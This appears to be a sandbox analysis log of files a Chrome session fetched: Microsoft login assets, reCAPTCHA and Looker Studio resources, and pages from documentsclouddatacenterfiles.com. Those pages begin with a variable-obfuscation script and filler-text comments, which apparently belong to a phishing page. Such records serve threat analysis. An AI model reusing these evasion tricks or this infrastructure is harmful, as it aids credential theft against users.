                                                          Preview:<svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M19.9088 3.95834C18.3013 3.95834 17.0969 5.1627 17.0969 6.77021C17.0969 7.30604 17.2313 7.84188 17.6328 8.37771L18.8371 7.17336V6.77191C18.8371 6.10169 19.3729 5.56755 20.0415 5.56755C20.71 5.56755 21.2458 6.10339 21.2458 6.77191C21.2458 7.44042 20.71 7.97626 20.0415 7.97626H19.64L18.4357 9.04793C19.7744 9.85083 21.5163 9.58377 22.3192 8.24503C23.1221 6.90629 22.855 5.1644 21.5163 4.3615C21.1148 4.09443 20.579 3.96004 19.9088 3.96004V3.95834Z" fill="#AECBFA"/>.<path d="M18.837 12.1269C18.837 11.1896 18.5699 10.2523 18.0341 9.4494L16.4266 11.0569C16.561 11.4584 16.6937 11.7271 16.6937 12.1286C16.6937 12.7988 16.4266 13.3329 16.0234 13.7361L16.8263 15.8794C18.1651 15.0765 18.8353 13.6034 18.8353 12.1303L18.837 12.1269Z" fill="#5E97F6"/>.<path d="M14.5521 14.4029C13.3477 14.4029 12.276 13.4656 12.276 12.2595C12.276 11.0535 13.2133 9.98351 14.4194 9.98351C14.8208 9.98351 15.3567 10.1179
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):316
                                                          Entropy (8bit):5.002900785531891
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:579E5AE9E692AC8183A2B8315A6C0507
                                                          SHA1:4F109B651D50246A23C3DF2E91D6B5AA2FDCE9EA
                                                          SHA-256:297C8CEE8619573FB8711CA1D6E064C70D8FFE8CE641F71A60D0315A4539391B
                                                          SHA-512:1517C93B6C0A8D8E5936DC9C282CEC494BB5C23C394A0118DB5657ABFBF3A415455EF01BA173A50AA6B75922DE9F1A08597ACA9362B8FA7B75830C617D1B2512
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://ssl.gstatic.com/datastudio%2Fcloud-lego-fe.fe-server_20250210.00_p7%2Fstatic/icon/reset.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24px" height="24px" viewBox="0 0 24 24" fill="currentColor">. <path d="M0 0h24v24H0z" fill="none"/>. <path d="M12.5 8c-2.65 0-5.05.99-6.9 2.6L2 7v9h9l-3.62-3.62c1.39-1.16 3.16-1.88 5.12-1.88 3.54 0 6.55 2.31 7.6 5.5l2.37-.78C21.08 11.03 17.15 8 12.5 8z"/>.</svg>.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                          Category:downloaded
                                                          Size (bytes):5529
                                                          Entropy (8bit):7.963357626093036
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2897F2B9FBDFCA48FD9E7C3EBACD4825
                                                          SHA1:1AC29A73147FAB24EECEDE0BBF4ABAC2B09B4FDA
                                                          SHA-256:34AC02CED788528E58CD6EBB75EDF624F4061D4839369AF860A36AC0BFC3C830
                                                          SHA-512:508CE7E7E1D3AE2101737E8D26A1257D516F8644ADC3AB5BE2A6B86C0B21CCFC32C1030B2014BE1280B9AF29AEB78A005D2242A2D12C68D2C3733941BCF64A42
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_4ba7c391e6f3f547d8ce.js
                                                          Preview:...........[}w.......q.Q.f......q....c..&9:H.$b..E.UK......$!..ss.`vgggg.}...j_i.....G...{.e[..\7.+....].:.......7.6....9p...(.D..a..Q.\hS...n...h.....I...S...H.h...^3...+7I.Z......?.C..F..?OR-.R..57.$../...,.x..O..D...I$.Q.%|..;l"f._.in.5.Sm.%.D.ai]......QHp...{@8....8........5Q....+dD.:.Z.i.h.Q_......6.r../..o6L..c.....A.E.O4.,A.k.!.....8qCby.....'.Oy.20.....Oc."O.4..(.y@w+....[..h.g.._[..f|}t......cSMM.4.....O'..5...^4......[..;..{...P....l.j6..Z3..~..uU.~g..W9./.....tC.G.]......._..~.A... v....C.S1.X|.dZ.LL........_}..=..C:..Y..x...a|m...c.%x.....[...j6t...p......c.fNd.6...&.*....%.. tS..<...A...c.3j=@3.5.. eS.u!>..j........B.kpE_.81.x./Z..&K.nI.L.n.vn.Q..&....Y:.... a8..f...)...."...;z..d(...{\.B.."R..n.g#.@.G<......S.qPt......r..H.V...s......w..['..$../..=.n.&sv...z.Q8...A.H...?..<..Y./....m.Y.........C*.F`M..I..p.?.n2........D.......,.%....GE....|..{....)....u......<!.>..~~.v...|.Cj....V.^s..M.9.i7....8I..8}8%...'.I#...Y..i.........
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                          Category:dropped
                                                          Size (bytes):1851
                                                          Entropy (8bit):5.434916616809272
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E31AE6463D70205D35DD7A4D1A379E43
                                                          SHA1:B9B50884488B09C8876DAA482249D121A1BF0717
                                                          SHA-256:C5C823F9D9496710F89B8AC3CECB28D003E890275D988972EEDED573D5758B8C
                                                          SHA-512:D6E027F034B6C6E583B29B406ED46C4B7946C6B89B56027F436EC5EA177452428B9875314BBC04DA941AE524D2D5D4F5EF66A064E7EC888E0F38F436A7FE024C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                          Category:downloaded
                                                          Size (bytes):1435
                                                          Entropy (8bit):7.8613342322590265
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 58358
                                                          Category:dropped
                                                          Size (bytes):16554
                                                          Entropy (8bit):7.986295720448826
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:ED8C452BA600B5D01523AE92EC363BDA
                                                          SHA1:26DE5667109976A5A0D26723B277471DF8A85207
                                                          SHA-256:3320F5D52A68637AEF39C696BF824716B206019D8FFBC4B3A23A6F0E9D8DC44C
                                                          SHA-512:C784CD9BC0A858A7A309A9B2EDB8A9B1407751BA2CC68AE6420B72A2FE0135C131D9B1FBDCEC8760C2EC4AC9597A9E46B4BCBDDFB9E360DC92C281F924878F7F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........}Ms#G.....u.O=.>...4.Ap.oH....)$....`/.n...p..8...;.j.|..G_|.O.........n....................l.Ob/.............l....q?..:...wI|Z.a..........[...M......P..J6..t...{.......`.~p....I.g..k<..!..4ix..U.Xt......i8....{.}..ox{....9.wb..h.q.qi...?.....qg.D.X..b..?.bOD...x.B1..X..`.N.^1..c.I.......h0.zs......q...to.b<...F...7...p.M. .fq..L........._..$./...Z#...w.8s}h3.;j./...\.!....q....-..`.M.....X..\..."...x!.A....e..pK.`y..b...*4....b1......_.z.......h.A...w&....#!..........?.s.V....G.._...J...4W.Vp........_J....t.._.....+(....wg..........I...E..~,..`[./.4..o...4....y..2.|..xr...ID...&..B.....S....M...5nEs2..'..mq.|b.....Pbi ...[_Lb.Z.....U`./{z.....u..[,.7....)P...[....T|..*.a!.!...\d..m..Zc..DDQ.....j....ts..!4.......)..a0.P.....7...{....)..QL..X.E. ...c.I:.3_......y......m../..i.....V...i.....5..W_b...b~.b.E]c...2..[...B.TH...C.k...~..sOf.2.2'..mAN.0....3wr..wC........2.!b....^.H.#.e.ck./~...9?../....a.%4c/b..H..9n.Y.2..?....
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):252
                                                          Entropy (8bit):5.052109758439807
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A6697B151A0437CFBCBCD86CD0FA2D14
                                                          SHA1:B99C6266344252A6286750F3B934C1282D207E58
                                                          SHA-256:547FBA17729B08006138F3F3632FFB1077EA768E0022F6E11DECC91557909195
                                                          SHA-512:715325A4FC959C586B38B319314E6D7956387BBF12C3AE5D33A4A381779AF79DE928A9FFC7C3D23B2488EC616FC286C84B26CC226470BC6E709E20F45B57FEE8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://firestore.googleapis.com/google.firestore.v1.Firestore/Write/channel?gsessionid=5ZaLfeYYAgzmXfnxpcVMUUtuTZmGttgtlcr4x44ZkqY&VER=8&database=projects%2Fdatastudio-prod-firestore%2Fdatabases%2F(default)&RID=rpc&SID=sUSJDy0P_TX_VZiGVwnSrg&AID=0&CI=0&TYPE=xmlhttp&zx=8u78j2ze01wg&t=1
                                                          Preview:63.[[1,[{. "streamId": "0",. "streamToken": "GRBoQgKB9LW1".}.]]]182.[[2,[{. "streamToken": "EAEZEGhCAoH0tbU=",. "writeResults": [. {. "updateTime": "2025-02-25T18:03:25.126081Z". }. ],. "commitTime": "2025-02-25T18:03:25.126081Z".}.]]]
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):2228
                                                          Entropy (8bit):7.82817506159911
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:EF9941290C50CD3866E2BA6B793F010D
                                                          SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                          SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                          SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                          Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):78627
                                                          Entropy (8bit):6.021146276271726
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:36D912FADD6B79FC24817B9C43AD8360
                                                          SHA1:19305C31EE90478B4D64E89A52D56F57628DFF71
                                                          SHA-256:5B8550F5927CE4D24E0AA7D1519798D075AA961170262CE7BABC171AD604D1EF
                                                          SHA-512:9753A8323B4F6F9AFBC1F760E7C09D9C25EE02B4AACD692CE7E39644625B1727F9CD1955F57C3D80BCD441FC0FC110717064E95A69BCB3084F2264741B449772
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/recaptcha/releases/IyZ984yGrXrBd6ihLOYGwy9X/styles__ltr.css
                                                          Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #444746;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1659), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):1659
                                                          Entropy (8bit):5.756674872260351
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A149B2585CDDFA0ACBED31F15152EAE3
                                                          SHA1:F61BD7EE060D183C3B456991A6BE4C2ADE2AEF25
                                                          SHA-256:4C45FA944A8342DFF635E1EA2D6F36794C06E91026E5A211D79E390D79560E7C
                                                          SHA-512:9BD866CB4F50EA917CDDC389572AA3A9B7CFE3B2776015ED97FE6BB0F566BE44F877D201447D30744EC286DD612222779D6237F533D06A80C7A550B647EFF0DC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.google.com/recaptcha/api.js?trustedtypes=true&render=6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE
                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcE_6MUAAAAACM2aL4qbFG8PNDIIl4krUNCLmXE');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (5281)
                                                          Category:downloaded
                                                          Size (bytes):8639
                                                          Entropy (8bit):4.377385237085798
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:742EEE4A7261D5812E3A72E28B541488
                                                          SHA1:60C0F9E0C2136C444A926DBE5390A8F7B77CC441
                                                          SHA-256:7C1EF1D0F3D6C1FB011C95A20CBA3347C59095A2B7D586D5AAC965FDADD9775C
                                                          SHA-512:F450FE552526C0E3556FE47132E2A896C1EB2DE9EFA4E2467E6E5D0B358829DEAFAF2B9CFE658D88B563BBB1FB7915D1F228D64E1DA70248E72F349830A13515
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://documentsclouddatacenterfiles.com/favicon.ico
                                                          Preview:. <!DOCTYPE html>. <html lang="en">. <head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. . </head>. <body>. . . <script>. (function() {. var obfuscateCode = function(code) {. var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';. var newVars = {};. . code = code.replace(/vars+([a-zA-Z_$][0-9a-zA-Z_$]*)/g, function(match, p1) {. if (!newVars[p1]) {. newVars[p1] = chars[Math.floor(Math.random() * chars.length)] + Math.floor(Math.random() * 1000);. }. return 'var ' + newVars[p1];. });. . code = code.replace(/([a-zA-Z_$][0-9a-zA-Z_$]*)/g, function(match, p1) {. return newVars[p1] || p1;. });. .
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):344
                                                          Entropy (8bit):4.594803396439005
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D83527403C4A767D97A4AF02BED83FC1
                                                          SHA1:45229835A73CD8620EA6EEC6D644B34DA9B2417B
                                                          SHA-256:962AEE2433F026ED7843790F6757DC3C25C34F349FEB9B4FE816629B1B22442D
                                                          SHA-512:90E2E99A9F627C83929BF445DC27A85C4985FAFF07A2AAE44A1576ED9577B880F33890E864BCD97DF1FD7D5C5B186F5C310A9204E0FED3BA344C5D4B5E2EC482
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M11 18h2v-2h-2v2zm1-16C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zm0-14c-2.21 0-4 1.79-4 4h2c0-1.1.9-2 2-2s2 .9 2 2c0 2-3 1.75-3 5h2c0-2.25 3-2.5 3-5 0-2.21-1.79-4-4-4z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (55850)
                                                          Category:downloaded
                                                          Size (bytes):55855
                                                          Entropy (8bit):5.995793564832738
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:291D808D4B58181D7920A00F5F016DAD
                                                          SHA1:A8B9051700A739DBE5ADA237C47D6E0E1DF83344
                                                          SHA-256:9B9D1E85E544FC3F887DC6BFAA0CC0DDBFBFA69EA73EAE66CC2B040241E7280E
                                                          SHA-512:08A1B8A41A6AA6013A757C2D2D4038885408657E8B262402CFAA1687002C1982E2E362BEA6033686B81DC962DE00D849022C9AC8FA249C7884A1B844FF957AD3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://lookerstudio.google.com/getImageV2?reportId=81df319f-c619-47b3-a6ca-c725ddb997af&id=ADpgoFVYV%2FnGjGKkaPduuVlic9dveoFsHciDQS2sgWmVRW9TG7npuYoJyyxcQE8YbagId8hkPN2b5pa2teWlLsUQlIsfEbmkvGearM8enCY1p8uWrdZPLddsmp6tCf0HcdOJ4PQM2Bv0PJgjYD6fK8OgcTJTDz60mlaVoidMtTQ%3D
                                                          Preview:)]}'.{"payload":"iVBORw0KGgoAAAANSUhEUgAAAdcAAAGTCAIAAAD1L8_sAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKMqSURBVHhe7b0HQFRZujU6_3_fe_e9O3P_uTOd43T39PR0TuZMLHIwZ0VRTBjIVAIExBww55xzzjkjgmSKqqLIiCKCEisAb-1zirJEbRVLofA7s2f3sThhn7VPLT7WF_afKmj7QwTqaSMECAFC4HUi8KfXTcLlT2wPaSMECAFCoIUh8CRTvW5uNFz_NbKw8VM1AvwBbYQAIUAItBgEGhGUMXe9AS5-LSz8VP41BryMNkKAECAEWgwCxuxkYOQ3xsWmZ2HD0PmHMTxedXW1Vqutq6t7nQILXZsQIAQIgaYgAGoCQYGmDJTFM5iB0F6fUWxiFn4qBePBiHyb8l7QOYQAIfDGEQBZGbj4zRCxKVnYmIL53yf4g0Oj0bxxGOmGhAAhQAi8EgIgLtAXz2Ov2yI2GQsTBb_SnNPJhAAh0MIQeGNEbGIWNgjB-DVSVVXVwlCl4RAChAAh8BIIgMSetIhNLhCbhoV5Q9jgjsO4S0tLSQt-idmmQwkBQqDlIQASA5XxRGysEZuWiE3Awo20CJ6CyRBueW8UjYgQIAReGgFQmTERv46QCZOxsEGLwIjv37-PmI-Xflw6gRAgBAiBFoYAqAyEBlpr5KkzoTlsYhbmDeGSkhKSI1rYu0TDIQQIgaYgACoDoT1pDrcgFm6kCPOG8L1795ryuHQOIUAIEAItDwEQmsEcfh3q8KvawgYW5qODeUOYWLjlvUg0IkKAEGgiAiC012oOm5iF8RsDwy0uLm7i49JphAAhQAi0MARAaKA1kJshWIK3Pk0lSpiAhQ0BagY5gli4hb1FNBxCgBBoOgIgtKeKEi2ChZ8lCt-9e7fpT0xnEgKEACHQkhAAob1WafiVbOGnisL4vUE
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (63558)
                                                          Category:downloaded
                                                          Size (bytes):202964
                                                          Entropy (8bit):3.3310690117830797
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2759C348B72C063B6B1B7ECC400D521C
                                                          SHA1:0E112415E048969BEF329FD42D6713D520276C6C
                                                          SHA-256:4D8FFF13C6F2B5DB2A525F3567A9FB5104A04B7C09EB631ACE34FE002AF95505
                                                          SHA-512:5B419E15BA51AE47FCFF4D43FFFA4978954768A7B6D7C46EF45F35F6BF7B192CB202EEDA8C756765A0082DD46CE225EC44F1F8C5281A0FE81E41216924886540
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://documentsclouddatacenterfiles.com/EyIqNHAA
                                                          Preview:. <!DOCTYPE html>. <html lang="en">. <head>. The fashion designer stitched garments that defined elegance. -->. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. The scientist made a discovery that revolutionized modern medicine. -->. </head>. <body>. . The cheesemaker aged wheels that burst with deep, rich flavors. -->. <script>. (function() {. var obfuscateCode = function(code) {. var chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';. var newVars = {};. . code = code.replace(/vars+([a-zA-Z_$][0-9a-zA-Z_$]*)/g, function(match, p1) {. if (!newVars[p1]) {. newVars[p1] = chars[Math.floor(Math.random() * chars.length)] + Math.floor(Math.random() * 1000);. }. return 'var ' + newVars[p1];. });. .
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 9285
                                                          Category:downloaded
                                                          Size (bytes):3921
                                                          Entropy (8bit):7.948633187405583
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BA9DA2AE129596B81DE1FAFFB02CD0F7
                                                          SHA1:8208ED791107C4D13D2DB619560EAC4707B03074
                                                          SHA-256:23DC170CF8AE0615D3E4A6F406DAE6A0FC002BB3CA385C0C2957BFE7000F147B
                                                          SHA-512:068268534557DE84E01F01EE2E9D025F4651183AA7A46D67286FD2E2482FEC84C618F1559CEE8256F9FC1F5CE1F8EB6F5808A2F67E49CBAB1C05758A80A5FA19
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js
                                                          Preview:...........Zks.6..>..F.d2.9.f.....+;..+...V.*.EB......m]K.}O.$E..$..26.G..8}.....Q.(.z..#.E^h.>...Bj..Z.*R.r..GJ..eo.2..4UY..X....U-^..{N..3..P;:x[w...._y..[...'.....r]D..~.nr...y=..#[-.BN............~4.uV+;.m.:..\siUi...,.KW.......a&h....)...^.N....v.3.@..a.bT.....-!\.......y.WY...J?G.i.V1.T..;;n'...U..Z ..t2...5.....E2..7PoG..s.."....z...M;Ap.z.......8..}..:|.f8.......I2G....J..Q.....OS.T!c.s..*......u.....0....;.k.$............s..V..K....xa..H......h....Z.yE.s..oN.x @.gnex.}E..1;7 .A.q.f]..W.!..........7,K&2.`].Y.'..j..X.A..n.I....ZxF.W.......~6O...-..[?..~..y.M...;..=.B.^....h.k.=<...0.Z........4.......K... .1K.@.<...nY.^s..p.......J..p0..>..}5.:l..?.Y.N.Z.Bu[....GTz...`.#..d...3!...4....wzp. ..Iws...W..E.o....5{..3...I|!.]..E. o.'M..`.. ...U.(.X# .r..:..;.D....JV.Jx..4*..j....5}.B.VI....)1x5..dN...(...q.y..cF..*......$......"s$.j...M`.Bu..A2..W.....\...=+...l..6..c.E0q3....7....]....&v..]...^.....u.z.cp..4\.L,.-..(..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2049)
                                                          Category:dropped
                                                          Size (bytes):14462
                                                          Entropy (8bit):5.470333180007293
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D37FBC2551527CF244FD730CAB395A29
                                                          SHA1:F66864BCA15A743D85110ED3D6438DC1315DCAC4
                                                          SHA-256:318F061284F06EFF703B6D85C04DB7D3C99FED8DF1E03B017F91426E63443DF9
                                                          SHA-512:D79A127D0AE92F1F09D53482E5C439F1CB7A824725EC58BCA7CA4A834EDE73783888E28420E6C962E05CB70A76E37CF943FAD576324296D73C1B47858C299B6B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
